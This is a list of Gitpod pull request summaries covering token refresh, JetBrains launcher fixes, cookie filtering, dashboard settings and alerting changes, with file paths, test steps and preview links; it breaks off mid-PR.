- dev/preview/infrastructure/variables.tf
- dev/preview/workflow/preview/deploy-gitpod.sh
- dev/preview/workflow/preview/deploy-monitoring-satellite.sh
Fixes #
There is no OIDC support yet, you need manual login gcloud by
```
gcloud auth login
gcloud auth application-default login
leeway run dev/preview/previewctl:install
```
<ul>
<li><b>🏷️ Name</b> - pd-test-de73866f082c</li>
<li><b>🔗 URL</b> - <a href="https://pd-test-de73866f082c.preview.gitpod-dev.com/workspaces" target="_blank">pd-test-de73866f082c.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📦 Version</b> - pd-test-dev-container-gha.25136</li>
<li><b>🗒️ …
> Add devcontainer support

- install/installer/pkg/components/ide-service/ide-configmap.json
- install/installer/pkg/components/workspace/ide/constants.go
Upgrade Browser VS Code to 1.89.1
Tested on https://github.com/gitpod-io/gitpod/pull/19726. So we can check about page's commit sha with stable code
<ul>
<li><b>🏷️ Name</b> - hw-1891-vs</li>
<li><b>🔗 URL</b> - <a href="https://hw-1891-vs.preview.gitpod-dev.com/workspaces" target="_blank">hw-1891-vs.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📦 Version</b> - hw-1891-vs-gha.25123</li> …
> [code] upgrade Browser VS Code to 1.89.1

- components/gitpod-db/src/typeorm/entity/db-token-entry.ts
- components/gitpod-db/src/typeorm/migration/1715096375962-TokenReservedUntil.ts
- components/gitpod-db/src/typeorm/user-db-impl.ts
- components/gitpod-db/src/user-db.ts
- components/gitpod-protocol/src/protocol.ts
- components/server/src/auth/auth-provider.ts
- components/server/src/auth/generic-auth-provider.ts
- components/server/src/prometheus-metrics.ts
- components/server/src/user/token-provider.ts
- components/server/src/user/token-service.spec.db.ts
- components/server/src/user/token-service.ts
- components/server/src/workspace/workspace-starter.ts
This aims to introduce a new feature for token refreshes with SCMs dubbed "opportunistic refresh". If the feature flag is enabled, AND the SCM requires it (for now only BitBucket Server!), we ask for a fresh token whenever we "safely" can.
This "safely" is determined by us storing a new `reservedUntilDate` with each SCM token, with is set/updated whenever we re-use a token. This way, whenever we do a lookup on a SCM token, we know whether we can safely refresh it or not.
**Operational controls**:
- introduces the `workspace_start_scm_access_token_lifetime` feature flag which controls the requested lifetime of a SCM token
- the default for SCM tokens is 5mins
- the default for SCM tokens on workspace start is 10mins
- we can override the later with this feature flag
- introduces the …
> Opportunistic token refresh (for BitBucket Server)

- components/ide/jetbrains/backend-plugin/src/main/kotlin/io/gitpod/jetbrains/remote/GitpodCLIService.kt
- components/ide/jetbrains/launcher/go.mod
- components/ide/jetbrains/launcher/go.sum
- components/ide/jetbrains/launcher/main.go
- components/supervisor/cmd/init.go
- components/supervisor/hot-deploy.sh
- components/supervisor/pkg/metrics/metrics.go
- components/supervisor/pkg/shared/constant.go
- components/supervisor/pkg/supervisor/services.go
- components/supervisor/pkg/supervisor/supervisor.go
- Bring functionality and compatibility to jb-launcer
- Proper handle ide readiness timeout in supervisor
We have three launcher in ide-configmap.json
- `jb-launcher:commit-2e8e2d9d60156010db07711335f362299242c6a7` -> latest -> compatible
- `jb-launcher:commit-614cc59b70f3ebfe26b3a31a32088da54af1c9db` -> `f5127b661152e8040d0806a757862148e0c027c8` -> compatible
- `b6bd8411cbb5682eb18ef60a3b9fa8cdbb2b64d9` -> `b704c9c97e76e2a6cf42dcea14fdddfb4f313dcc`
Only the third one need to add compatible code
```
func linkRemotePlugin(launchCtx *LaunchContext) error {
launchCtx.backendDir + "/plugins/gitpod-remote"
// to
func linkRemotePlugin(launchCtx *LaunchContext) error {
launchCtx.configDir + "/plugins/gitpod-remote"
```
Relates ENT-19, ENT-35 …
> Build - make backend-plugin readiness a condition of JetBrains IDEs readiness

- dev/preview/workflow/preview/post-process.sh
- install/installer/pkg/components/registry-facade/daemonset.go
- install/installer/pkg/components/registry-facade/objects.go
[registry-facade] switch to use hostPort
Fixes ENT-30
Tested mutil workspace node
Tested start from zero node
<ul>
<li><b>🏷️ Name</b> - pd-hostnetwork</li>
<li><b>🔗 URL</b> - <a href="https://pd-hostnetwork.preview.gitpod-dev.com/workspaces" target="_blank">pd-hostnetwork.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📦 Version</b> - pd-hostnetwork-gha.25194</li>
<li><b>🗒️ Logs</b> - <a href="https://console.cloud.google.com/logs/query;query=jsonPayload.kubernetes.ho …
> [registry-facade] switch to use hostPort

- dev/preview/workflow/preview/patch-ide-configmap.js
- install/installer/pkg/components/ide-service/ide-configmap.json
- install/installer/pkg/components/ide-service/ide_config_configmap.go
Part 2 of https://github.com/gitpod-io/gitpod/pull/19710
Fixes ENT-19, ENT-35
Smoke test IDEs, they should all works
Feature flags:
- `jb_wait_backend_plugin_readiness` - control whether launcher will check backend-plugin or not
- `supervisor_ide_not_ready_shutdown_duration` - control the duration of supervisor to shutdown itself when IDEs are not ready
|Case|FF|VSCode Desktop | IntelliJ | pinned IntelliJ (2023.3.6) | previous IntelliJ | Rider (buggy) |
|:-:|:-:|:-:|:-:|:-:|:-:|:-:|
| ✅ FF init values | `false`, `undefined` | <img width="639" alt="image" src="https://github.com/gitpod-io/gitpod/assets/20944364/dd54b4ad-0257-49b2-a5d4-4dda1fbb87e9">|<img width="1157" alt="image" src="https://github.com/gitpod-io/gitpod/assets/20944364/2f3055d8-0976-43bb-8ddb-c7edd85c4337">|<img …
> Update JetBrains launcher image

- components/image-builder-mk3/pkg/orchestrator/orchestrator.go
- components/server/src/workspace/workspace-starter.ts
With https://github.com/gitpod-io/gitpod/pull/19474 a bug was introduced that ignores two registry authentication special cases:
1. installation defined registry auth ([code](https://github.com/gitpod-io/gitpod/pull/19474/files#diff-b1c591e18af598ccba93b570ce7c97dece0988c9109a6d3be82bbe0df1fbd619L1057-L1062))
- this is an old self-hosted feature, and we don't seem to be using it anymore :heavy_check_mark:  
2. user-defined registry auth (the `GITPOD_IMAGE_AUTH` variable)
- this one is fixed with this PR :point_down:  
Fixes ENT-72
- start an image build referencing a base image in a private repository (via `GITPOD_IMAGE_AUTH`)
<ul>
<li><b>🏷️ Name</b> - gpl-72-fixab59193ca7</li> …
> [image-builder] Fix ignoring of user-passed authentication

- .github/CODEOWNERS
As discussed in our last team sync
Fixes #
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> [dev] Make Team Enterprise co-own everything

- components/dashboard/src/data/workspaces/listen-to-workspace-ws-messages.ts
- components/dashboard/src/start/StartWorkspace.tsx
if instanceId changed while last received phase is not STOPPED (like network problem or something else), we will ignore status updates
Fixes ENT-52
Not sure
<ul>
<li><b>🏷️ Name</b> - hw-try-stop</li>
<li><b>🔗 URL</b> - <a href="https://hw-try-stop.preview.gitpod-dev.com/workspaces" target="_blank">hw-try-stop.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📦 Version</b> - hw-try-stop-gha.25249</li> …
> Switch to new instance when instanceId updated

- components/ws-manager-bridge/src/healthz.ts
- components/ws-manager-bridge/src/main.ts
- install/installer/pkg/components/ws-manager-bridge/deployment.go
Adds a health endpoint to ws-manager-bridge
Fixes https://linear.app/gitpod/issue/ENT-119/[bridge]-potential-endless-loop-in-cluster-service
Start a workspace successfully.
<ul>
<li><b>🏷️ Name</b> - se-healthz</li>
<li><b>🔗 URL</b> - <a href="https://se-healthz.preview.gitpod-dev.com/workspaces" target="_blank">se-healthz.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📦 Version</b> - se-healthz-gha.25244</li> …
> [bridge] add healthz endpoint

- components/image-builder-mk3/pkg/auth/auth.go
- components/image-builder-mk3/pkg/orchestrator/orchestrator.go
- components/image-builder-mk3/pkg/resolve/resolve.go
- dev/gpctl/cmd/imagebuilds-build-batch.go
- dev/gpctl/cmd/imagebuilds-list.go
- gitpod-ws.code-workspace
* Improve logging and tracing for build
* Add ws-manager-bridge to VS Code workspace
* Be able to trigger image builds with gpctl again
Related to ENT-72
Related to #19745 
<ul>
<li><b>🏷️ Name</b> - kylos101-i2fedbade13</li>
<li><b>🔗 URL</b> - <a href="https://kylos101-i2fedbade13.preview.gitpod-dev.com/workspaces" target="_blank">kylos101-i2fedbade13.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📦 Version</b> - kylos101-imagebuild-unauth-gha.25151</li>
<li><b>🗒️ …
> [image-builder-mk3] Improve logging and tracing for build

- operations/observability/mixins/meta/rules/ws-manager-bridge.yaml
Alert on-call when `ws-manager-bridge` events received is too high. I'll open a PR next for the runbook.
Fixes n/a
This would of been detected here:
And helped us sooner detect:
https://www.gitpodstatus.com/incidents/45kq0brg7pfx
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
Valid …
> [obs] alert on-call when ws-manager-bridge events received is too high

- operations/observability/mixins/meta/rules/ws-manager-bridge.yaml
Fixes #
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> [obs] Opt WsManagerBridgeHighEventsReceived into Enterprise alering

- components/ide/jetbrains/launcher/main.go
Fixes #
- If preview env is deleted, you may need to recreate yourself `TF_VAR_with_large_vm=true leeway run dev:preview` and change `g1-standard` workspace class to have `30Gi` storage
- Open this PR with **Gitpod** and exec cmd below to use current launcher
```
cd /workspace/gitpod/components/ide/jetbrains/launcher
./hot-deploy.sh
```
- Open this repo with **preview env** + stable IntelliJ
- Exec commands below to get a dev env launched, it should be able to connect
```
cd /workspace/gitpod/components/ide/jetbrains/backend-plugin
./launch-dev-server.sh -s
```
<ul>
<li><b>🏷️ Name</b> - hw-jb-impv</li>
<li><b>🔗 URL</b> - <a href="https://hw-jb-impv.preview.gitpod-dev.com/workspaces" …
> [jb] bring more compatibility to cwm joinLink

- operations/observability/mixins/cross-teams/dashboards/gitpod-overview.json
They were under the normalized load average for headless nodes
Fixes n/a
Will look like:
Presently looks like:
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [obs] fix startup time panels

- components/server/src/user/token-service.ts
Noticed while checking metrics, that all errors get reported as "success" as well :grimacing: - the line ended up in the wrong branch. 
Fixes #
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [server] Fix mis-reporting of errors as "success" (in addition)

- .devcontainer/Dockerfile
- .devcontainer/devcontainer.json
- .pre-commit-config.yaml
- dev/BUILD.yaml
- dev/install-dependencies.sh
- dev/next-oidc/oidc.js
- dev/preview/workflow/preview/configure-workspace.sh
This PR adds OIDC support for dev container, and introduces some leeway scripts 
```shell
leeway run dev:prepare
leeway run dev:install-dev-utils
leeway run dev:prepare-ts
```
Fixes #
1. open this PR in ec2 / dogfood check everything still work
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
Saves cost. Untick this only if you're really sure you need a non-preemtible …
> improve dev container

- .github/workflows/code-build.yaml
- .github/workflows/code-nightly.yml
- .github/workflows/code-updates.yml
Fixes #
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> Add openvscode-server release in code update GHA

- operations/observability/mixins/workspace/rules/satellite/workspaces.yaml
[alert] remove WorkspacesNotStartingMk2 and WorkspaceTooManyRegularNotActiveMk2 from dedicated
move it to dedicated repo [PR](https://github.com/gitpod-io/gitpod-dedicated/pull/3363), so we can set the different thresholds
Part of ENT-117
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [alert] remove WorkspacesNotStartingMk2 and WorkspaceTooManyRegularNotActiveMk2 from dedicated

- components/dashboard/src/service/service.tsx
We currently send a close heartbeat when a user closes the standard workspace tab that sits there when opening a workspace with a desktop IDE. This changes the timeout to 5 min which in cse of IntelliJ is often not long enough as it only treats cursor activity as activity.
Fixes https://linear.app/gitpod/issue/ENT-7/fix-timeout-problem
- start a workspace with intellij
- close the browser tab
- wait for more than 5 min and verify that the workspace is not stopped (after 30min it should!)
- close the intellij, wait 5min and verify that now the workspace timed out.
<ul>
<li><b>🏷️ Name</b> - se-heartbe6e1b517fd4</li>
<li><b>🔗 URL</b> - <a href="https://se-heartbe6e1b517fd4.preview.gitpod-dev.com/workspaces" …
> [dashboard] only send close heartbeat when web IDEs are closed

- components/ide/code/leeway.Dockerfile
Fixes #
See https://github.com/gitpod-io/gitpod/actions/runs/9188500528 and build in current PR
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> Updata code build image

- components/dashboard/src/menu/OrganizationSelector.tsx
enterprise setup admins currently see the "create organization" menu item which lead to confusion.
Fixes https://linear.app/gitpod/issue/ENT-105/bug-when-adding-additional-org-to-demo-cell-broke-login-screen-to
<ul>
<li><b>🏷️ Name</b> - se-single-org-admin</li>
<li><b>🔗 URL</b> - <a href="https://se-single-org-admin.preview.gitpod-dev.com/workspaces" target="_blank">se-single-org-admin.preview.gitpod-dev.com/workspaces</a>.</li> …
> [dashboard] don't show add org in dedicated

- components/server/src/user/token-service.spec.db.ts
- components/server/src/user/token-service.ts
- components/server/src/workspace/workspace-starter.ts
Drops the workspace_start_scm_access_token_lifetime and opportunistic_token_refresh feature flags
Fixes ENT-84
Fixes ENT-85
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> Remove token refresh feature flags

- components/dashboard/src/Login.tsx
Adds Gitpod Enterprise callout on `/login` page for PAYG users
When opened via Context URL (e.g., GitHub repository)
Fixes OPM-601
- Open preview environment
- and see the changes on login page :)
<ul>
<li><b>🏷️ Name</b> - siddhant-of465c1c6ad</li>
<li><b>🔗 URL</b> - <a href="https://siddhant-of465c1c6ad.preview.gitpod-dev.com/workspaces" target="_blank">siddhant-of465c1c6ad.preview.gitpod-dev.com/workspaces</a>.</li> …
> [PAYG-dashboard] Add Gitpod Enterprise callout on login page for PAYG users

- components/supervisor/pkg/terminal/terminal.go
Before closing the listeners channel, we need to make sure we don't write into it anymore. We do set a flag ("closed"), however neither that nor the actually channel closing is synced with the actual `Write` method's mutex.
This change just moves the lock acquiring up one line to make sure we close the channel only if there's nobody writing to it.
We don't wrap the more of the function, because we don't want to block all listeners if closing a single writer is slow
Fixes ENT-175
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [supervisor] Fix race on terminal listener closing

- components/server/go/BUILD.yaml
- components/server/go/go.mod
- components/server/go/pkg/lib/cookie.go
- components/ws-proxy/BUILD.yaml
- components/ws-proxy/go.mod
- components/ws-proxy/pkg/proxy/routes_test.go
- install/installer/BUILD.yaml
- install/installer/go.mod
- install/installer/pkg/components/auth/config.go
- install/installer/pkg/components/auth/config_test.go
Follow up after an incident we had recently.
Fixes ENT-67
- see that the build is :green_circle: 
<ul>
<li><b>🏷️ Name</b> - gpl-67-cookie-test</li>
<li><b>🔗 URL</b> - <a href="https://gpl-67-cookie-test.preview.gitpod-dev.com/workspaces" target="_blank">gpl-67-cookie-test.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📦 Version</b> - gpl-67-cookie-test-gha.25448</li>
<li><b>🗒️ Logs</b> - <a href="https://console.cloud.google.com/logs/query;query=jsonPayload.kubernete …
> [server, ws-proxy] Test cookie filter against real name generator

- .github/workflows/update-image-digest.yml
[action] skip update image if it's failed to resolve
Fixes #
see action https://github.com/gitpod-io/gitpod/actions/runs/9258611007 and automatic PR https://github.com/gitpod-io/gitpod/pull/19785
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [action] skip update image if it's failed to resolve

- components/ws-manager-bridge/src/bridge-controller.ts
- components/ws-manager-bridge/src/bridge.ts
- components/ws-manager-bridge/src/workspace-instance-controller.ts
- components/ws-manager-bridge/src/wsman-subscriber.ts
Fixes logging, + a missign `dispoables.push`
Fixes ENT-187
<ul>
<li><b>🏷️ Name</b> - gpl-187-bridge-log</li>
<li><b>🔗 URL</b> - <a href="https://gpl-187-bridge-log.preview.gitpod-dev.com/workspaces" target="_blank">gpl-187-bridge-log.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📦 Version</b> - gpl-187-bridge-log-gha.25479</li>
<li><b>🗒️ Logs</b> - <a href="https://console.cloud.google.com/logs/query;query=jsonPayload.kubernetes.host%3D%22preview-gpl-187-bridge-log% …
> [bridge] Fix logging/bridge.stop

- components/ws-proxy/pkg/proxy/auth_test.go
- components/ws-proxy/pkg/proxy/routes.go
- components/ws-proxy/pkg/proxy/routes_test.go
Instead of only filtering auth cookies from port routes, filter it from all routes that are are:
- pointing at the workspace pod
- not directly meant for supervisor
Fixes ENT-70
- see that you can start a workspace
<ul>
<li><b>🏷️ Name</b> - gpl-70-fil05f72cb4be</li>
<li><b>🔗 URL</b> - <a href="https://gpl-70-fil05f72cb4be.preview.gitpod-dev.com/workspaces" target="_blank">gpl-70-fil05f72cb4be.preview.gitpod-dev.com/workspaces</a>.</li> …
> [ws-proxy] Filter cookies on all routes that send traffic to the workspace (except supervisor)

- components/server/src/workspace/workspace-starter.ts
This PR does three things:
1. does away with the feature flag `workspace_start_check_pending_first`
2. fixes a bug that failed to map `ScmStartError` to `StartInstanceError`
3. merges the two cascading try...catch block into a single one
To be more safe while rolling this out, we also keep the old code around, and have the feature flag `workspace_start_old` to switch back to it should be notice anything odd.
:information_source: The PR is best reviewed a) commit-per-commit and b) with "split view"+"whitespace hidden":
Fixes ENT-178
<ul>
<li><b>🏷️ Name</b> - gpl-178-scm-error</li>
<li><b>🔗 URL</b> - <a href="https://gpl-178-scm-error.preview.gitpod-dev.com/workspaces" …
> WorkspaceStarter: fix + cleanup error handling

- components/server/src/bitbucket-server/bitbucket-server-context-parser.ts
- components/server/src/config/config-inferrer.spec.ts
- components/server/src/config/config-inferrer.ts
The config inferrer currently checks the repo for config files sequentially.
With this change the files are fetched once in parallel in the beginning, cutting down to the longest request instead of the sum of all requests.
Related to https://linear.app/gitpod/issue/ENT-171/new-workspaces-dialog-is-blocked-for-5-sec-for-dynatrace
<ul>
<li><b>🏷️ Name</b> - se-log-bbs-access</li>
<li><b>🔗 URL</b> - <a href="https://se-log-bbs-access.preview.gitpod-dev.com/workspaces" target="_blank">se-log-bbs-access.preview.gitpod-dev.com/workspaces</a>.</li> …
> [server] eagerly fetch config files in parallel

- components/dashboard/src/app/AppRoutes.tsx
- components/dashboard/src/teams/TeamNetworking.tsx
- components/dashboard/src/teams/TeamPolicies.tsx
Related to https://github.com/gitpod-io/gitpod/pull/19788
Fixes OPM-609
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> [dashboard] Add Organization Networking settings page

- components/dashboard/src/app/AppRoutes.tsx
- components/dashboard/src/teams/TeamAuthentication.tsx
- components/dashboard/src/teams/TeamPolicies.tsx
Related to #19788
Fixes OPM-610
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> [dashboard] Add Organization Authenitcation settings page

- components/dashboard/src/teams/TeamUsageBasedBilling.tsx
This pull request adds an owner check to the `/billing` page. If the user is not the owner of the organization, they will be redirected to the `/settings` page. This ensures that only the owner can access the billing page.
Fixes [internal conv.](https://gitpod.slack.com/archives/C071G5TTS49/p1716949094559919)
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
Saves cost. …
> [dashboard] Add owner check to `/billing` page

- components/server/src/auth/generic-auth-provider.ts
We want to set website visitor preference cookies for all users on cloud signup if no prior preferences exist
Fixes [DAT-531](https://linear.app/gitpod/issue/DAT-531/set-website-cookies-on-cloud-signup)
1. Open preview environment
2. Sign up
3. Check in the application tab of the dev tool that the three `gp-` prefixed cookies are set
4. delete one of them
5. delete the user and sign up again
6. Ensure that the deleted cookie is set again and that the other two contain the old timestamp
<ul>
<li><b>🏷️ Name</b> - dat-531</li>
<li><b>🔗 URL</b> - <a href="https://dat-531.preview.gitpod-dev.com/workspaces" target="_blank">dat-531.preview.gitpod-dev.com/workspaces</a>.</li> …
> set visitor prefence cookies of website on signup if no previous selection has been made

- components/dashboard/src/teams/Members.tsx
This pull request adds an Enterprise callout in the Invite members modal for all PAYG users. 
| ![image](https://github.com/gitpod-io/gitpod/assets/55068936/a7c6f851-38c7-4aa4-8c06-c30cf3b9a143) | ![image](https://github.com/gitpod-io/gitpod/assets/55068936/623c4bca-ee79-4d35-ac6c-a0dd467143fa) | 
Fixes [internal conversation](https://gitpod.slack.com/archives/C074K0JASMQ/p1716910331259239?thread_ts=1716780362.152069&cid=C074K0JASMQ)
- Open preview environment
- Go to members section of your org.
- click on `Invite members` and see :eyes:
gitpod:summary
<details>
</details>
<details>
</details>
<details> …
> [PAYG-dashboard] Enterprise callout in Invite members modal for all PAYG users

- components/dashboard/src/data/git-providers/unified-repositories-search-query.ts
old:
new:
Fixes ENT-165
Fixes ENT-200
<ul>
<li><b>🏷️ Name</b> - gpl-165-brda2d70b400</li>
<li><b>🔗 URL</b> - <a href="https://gpl-165-brda2d70b400.preview.gitpod-dev.com/workspaces" target="_blank">gpl-165-brda2d70b400.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📦 Version</b> - gpl-165-branch-capitalization-gha.25578</li>
<li><b>🗒️ Logs</b> - <a href="https://console.cloud.google.com/logs/query;query=jsonPayload.kubernetes.host%3D%22preview-gpl-165-brda2d70b400%22 …
> [dashboard] Don't lowercase context URLs

- components/dashboard/src/start/VerifyModal.tsx
We so far don't tell users that they could put in a credit card in order to verify.
Fixes #
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [dashboard] tell users to verify by signing up

- components/dashboard/src/workspaces/CreateWorkspacePage.tsx
Not sure if we are aligned here, but this would be a huge improvement for my personal workflow.
Fixes #
<ul>
<li><b>🏷️ Name</b> - gpl-start-shortcut</li>
<li><b>🔗 URL</b> - <a href="https://gpl-start-shortcut.preview.gitpod-dev.com/workspaces" target="_blank">gpl-start-shortcut.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📦 Version</b> - gpl-start-shortcut-gha.25609</li>
<li><b>🗒️ Logs</b> - <a href="https://console.cloud.google.com/logs/query;query=jsonPayload.kub …
> [dashboard] StartWorkspace modal: Ctrl+Enter as shortcut for "Continue"

- install/installer/pkg/components/registry-facade/daemonset.go
- install/installer/pkg/components/ws-daemon/daemonset.go
Ensures that ws-daemon and registry-facade can tolerate taints on GPU nodes.
Fixes ENT-201
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> Tolerate GPU taint

- components/ws-daemon/pkg/cgroup/plugin_fuse_v2.go
Modifying the eBPF program attached to the cgroup can interfere with other components that also want to modify the eBPF program. This provides a way to selectively disable the modification of the eBPF program. This is a temporary measure until we switch to device plugins.
Fixes ENT-190
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
Saves cost. Untick this only if you're …
> Provide option to disable fuse device

- install/installer/pkg/components/ide-service/ide-configmap.json
CodeWithMe response data's format is changed and it also affects old IDE versions 🫨
See also https://github.com/gitpod-io/gitpod/pull/19751
Fixes ENT-204
It should be able to start workspaces with IntelliJ 2023 (must test) and other changed versions
example repo: https://github.com/spring-projects/spring-petclinic
✅ 
<ul>
<li><b>🏷️ Name</b> - hw-fix-iu2023</li>
<li><b>🔗 URL</b> - <a href="https://hw-fix-iu2023.preview.gitpod-dev.com/workspaces" target="_blank">hw-fix-iu2023.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📚 Documentation</b> - See our <a href="https://www.notion.so/gitpod/6debd359591b43688b52f76329d04010#7c1ce80ab31a41e29eff2735e38eec39" target="_blank">internal documentation</a> for information on how …
> [JetBrains] support new cwm response format

- components/dashboard/src/app/AppRoutes.tsx
- components/dashboard/src/components/PageWithSubMenu.tsx
- components/dashboard/src/components/PillLabel.tsx
- components/dashboard/src/components/podkit/buttons/LinkButton.tsx
- components/dashboard/src/components/podkit/typography/Headings.tsx
- components/dashboard/src/components/typography/headings.tsx
- components/dashboard/src/repositories/detail/ConfigurationSettingsField.tsx
- components/dashboard/src/teams/OrgSettingsPage.tsx
- components/dashboard/src/teams/TeamAuthentication.tsx
- components/dashboard/src/teams/TeamNetworking.tsx
- components/dashboard/src/teams/TeamPolicies.tsx
- components/dashboard/src/teams/TeamSettings.tsx
- components/dashboard/src/user-settings/PersonalAccessTokens.tsx
This PR introduces a division of the Organization's "General settings" into two distinct sections: "General" and "Policies." This change aims to provide more fine-grained control over organization settings. Additionally, new sections for "Networking" and "Authentication" have been introduced with specific visibility rules for PAYG (Pay-As-You-Go)
1. **General Settings Split:**
- **General:**
- **Content:** Set the default role and workspace image, name or delete your organization.
- **Visibility:** Available on both Enterprise and PAYG.
- **URL Structure:** `/settings`
- **Policies:**
- **Content:** Restrict workspace classes, editors, and sharing across your organization.
- **Visibility:** Available on both Enterprise and PAYG.
- **URL Structure:** `/settings/policy`
2. **New Sections:** …
> [dashboard] Restructure Organization Settings

- components/gitpod-cli/cmd/init.go
- components/gitpod-cli/pkg/gitpodlib/config.go
Fixes ENT-199
- Exec `gp init`, there should have no `image` field
- Update org settings to set a default image
- Exec `gp init` again, `image` field should align to what you have set
- Try also `gp init -i`
<ul>
<li><b>🏷️ Name</b> - hw-ent-199</li>
<li><b>🔗 URL</b> - <a href="https://hw-ent-199.preview.gitpod-dev.com/workspaces" target="_blank">hw-ent-199.preview.gitpod-dev.com/workspaces</a>.</li> …
> [GP-CLI] fix incorrect pre-configured workspace image for enterprise

- components/dashboard/src/data/configurations/configuration-queries.ts
- components/dashboard/src/data/ide-options/ide-options-query.ts
- components/dashboard/src/data/organizations/org-settings-query.ts
- components/dashboard/src/data/workspaces/workspace-classes-query.ts
- components/dashboard/src/prebuilds/list/RunPrebuildModal.tsx
This PR fixes two related bugs in two react queries:
- react query can't store `undefined` in the cache, hence the errors we saw before (bug 1)
- we can't work around that with errors as they bubble up the chain and pollute logs :red_circle: 
- we can't work around that with `enabled: !!organizationId`, as that will lead to the query be stuck on `isLoading: true` indefinitely (bug 2)
- solution:
- internally store `null`
- map that to `undefined` using the `select` option
Proof that `useOrgSettingsQuery` still works in the `organizationId: undefined` (sign up) case:
Fixes ENT-203
- [sign up](https://gpl-203-cofdb4a94577.preview.gitpod-dev.com/workspaces), and verify that you can use/change your editor choice :heavy_check_mark: 
- open the "start workspace" dialog and see how it works in …
> [dashboard] Fix queries useOrgSettings/useConfiguration

- components/ws-daemon/pkg/controller/workspace_controller.go
- components/ws-daemon/pkg/controller/workspace_operations.go
- components/ws-manager-mk2/controllers/status.go
Backup prebuild log even it's fail
Fixes ENT-31
1. Add repo in preview
2. start a prebuild with a branch, `.gitpod.yml` example like below
3. try many times, it should be able to view the prebuild logs, even if it failed.
4. and if you check minio, in the fail prebuild, it only contains logs , for success prebuild it contains logs and content
| Fail    | Success |
| -------- | ------- |
| <img width="1813" alt="image" src="https://github.com/gitpod-io/gitpod/assets/8299500/51927be8-58b3-4c44-a681-20b03d66d1bd">  |  <img width="1736" alt="image" src="https://github.com/gitpod-io/gitpod/assets/8299500/26d5307f-ccb8-4463-be38-8304aec890bc">    |
```
tasks:
- name: test
init: exit 1
```
<ul>
<li><b>🏷️ Name</b> - …
> Backup prebuild logs even it's fail

- install/installer/pkg/components/ide-service/ide-configmap.json
This PR updates the VS Code Browser image layers to the most recent intaller version.
Test if changes are working.
i.e.
- `code-helper` it can start browser code with extensions installed
- `gitpod-web-extension` extension functionalities are works well
- `code` is not expected it to be changed
<ul> …
> [code] update code image layers

- components/public-api/typescript-common/fixtures/toPrebuild_1.golden
- components/public-api/typescript-common/src/public-api-converter.ts
Fixes #
Build succeed
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> Fix main build golden tests

- components/ws-manager-mk2/controllers/workspace_controller_test.go
[ws-manager-mk2] fix test
Fixes ENT-222
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> [ws-manager-mk2] fix test

- components/dashboard/src/components/WorkspaceLogs.tsx
Increase the contrast of dashboard log view
Fixes ENT-136
- Open preview and trigger prebuilds
- See selection color
|Dark|Light|
|:-:|:-:|
|<img width="1585" alt="SCR-20240531-nzlw" src="https://github.com/gitpod-io/gitpod/assets/20944364/eedf76f7-9b55-451a-b9b4-901b8eaa05a0">|<img width="1474" alt="SCR-20240531-nzji" src="https://github.com/gitpod-io/gitpod/assets/20944364/ca245d4c-c1b1-465f-bc4b-1a42c445c2c9">|
<ul>
<li><b>🏷️ Name</b> - hw-terminal-improve</li>
<li><b>🔗 URL</b> - <a href="https://hw-terminal-improve.preview.gitpod-dev.com/workspaces" target="_blank">hw-terminal-improve.preview.gitpod-dev.com/workspaces</a>.</li> …
> Increase the contrast of dashboard log view

- components/server/src/workspace/workspace-service.ts
- components/supervisor/pkg/serverapi/publicapi.go
- components/supervisor/pkg/serverapi/publicapi_test.go
Limits size of `gitStatus` to 4096 bytes max.
Context: ENT-38
Fixes ENT-209
- use [this script](https://gist.github.com/geropl/850f82197a51abd0868293285248f09b) to generate some files
- notice GitStatus still works:
- no error logs in `server` :heavy_check_mark: 
- UI shows git status like this :heavy_check_mark: 
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> Cap length of GitStatus updates

- components/gitpod-db/src/periodic-deleter.ts
- components/server/src/authorization/relationship-updater-job.ts
- components/server/src/container-module.ts
- components/server/src/jobs/cap-git-status.ts
- components/server/src/jobs/database-gc.ts
- components/server/src/jobs/installation-admin-cleanup.ts
- components/server/src/jobs/ots-gc.ts
- components/server/src/jobs/runner.ts
- components/server/src/jobs/snapshots.ts
- components/server/src/jobs/token-gc.ts
- components/server/src/jobs/webhook-gc.ts
- components/server/src/jobs/workspace-gc.ts
- components/server/src/prometheus-metrics.ts
- components/server/src/workspace/workspace-service.ts
- components/server/src/workspace/workspace-start-controller.ts
This job is meant to cleanup old state in the DB where `WorkspaceInstance.gitStatus` (or the old location, `WorkspaceInstance.status.repo`) are too long.
Fixes ENT-210
Depends on: #19810
- insert the following instance into the DB
```
